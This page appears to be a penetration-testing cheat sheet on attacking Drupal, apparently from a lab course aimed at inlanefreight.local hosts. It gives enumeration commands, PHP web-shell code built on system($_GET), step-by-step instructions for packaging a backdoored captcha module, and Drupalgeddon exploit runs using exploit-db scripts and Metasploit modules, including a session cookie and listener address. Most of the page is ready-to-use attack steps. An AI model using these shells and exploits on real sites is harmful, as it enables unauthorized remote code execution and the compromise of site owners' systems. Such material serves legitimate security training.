Drupal

Enumeration

Getting Version Number

$ curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""

Automating Using Droopescan

$ droopescan scan drupal -u http://drupal.inlanefreight.local

Exploitation

Code Execution

Before Drupal 8
- Login as admin
- enable PHP filter module -> Save
- Content -> Add content -> Basic Page (Set Text Format to PHP Code)
```
<?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?>
```
Drupal 8 onwards
- Login as admin
- $ wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
- Administrattion -> Reports -> Available Updates
- Upload the downloaded php filter module
- You can now do the process of uploading a shell just like in version < 8.0

Uploading a Backdoored Module

Download and extract a module

$ wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
$ tar xvf captcha-8.x-1.2.tar.gz

Create a php webshell

<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

Edit .htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Move the files to the extracted folder and tar (zip) it

$ mv shell.php .htaccess captcha
$ tar cvf captcha.tar.gz captcha/

Install the backdoored module (Manage -> Extend -> Install new module)
Browse /modules/captcha/shell.php to execute commands.

Drupalgeddon

CVE-2014-3704 (7.0 <= 7.31) - Pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.

$ wget https://www.exploit-db.com/raw/34992
$ python2.7 34992 -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd

$ msfconsole
msf6 > use exploit/multi/http/drupal_drupageddon

CVE-2018-7600 (7.58 <=8.5.1) - Remote code execution vulnerability

$ wget https://www.exploit-db.com/raw/44448
$ python3 drupalgeddon2.py 

Enter target url (example: https://domain.ltd/): http://drupal-dev.inlanefreight.local/

Check: http://drupal-dev.inlanefreight.local/hello.txt

CVE-2018-7602 (7.x, 8.x) - Authenticated Remote code execution vulnerability

msf6 > use exploit/multi/http/drupal_drupageddon
msf6 exploit(multi/http/drupal_drupageddon3) > set rhosts 10.129.42.195
msf6 exploit(multi/http/drupal_drupageddon3) > set VHOST drupal-acc.inlanefreight.local   
msf6 exploit(multi/http/drupal_drupageddon3) > set drupal_session SESS45ecfcb93a827c3e578eae161f280548=jaAPbanr2KhLkLJwo69t0UOkn2505tXCaEdu33ULV2Y
msf6 exploit(multi/http/drupal_drupageddon3) > set DRUPAL_NODE 1
msf6 exploit(multi/http/drupal_drupageddon3) > set LHOST 10.10.14.15

PreviousJoomla NextTomcat

Last updated 2 years ago

hashtagEnumeration

hashtagGetting Version Number

hashtagAutomating Using Droopescan

hashtagExploitation

hashtagCode Execution

hashtagUploading a Backdoored Module

hashtagDrupalgeddon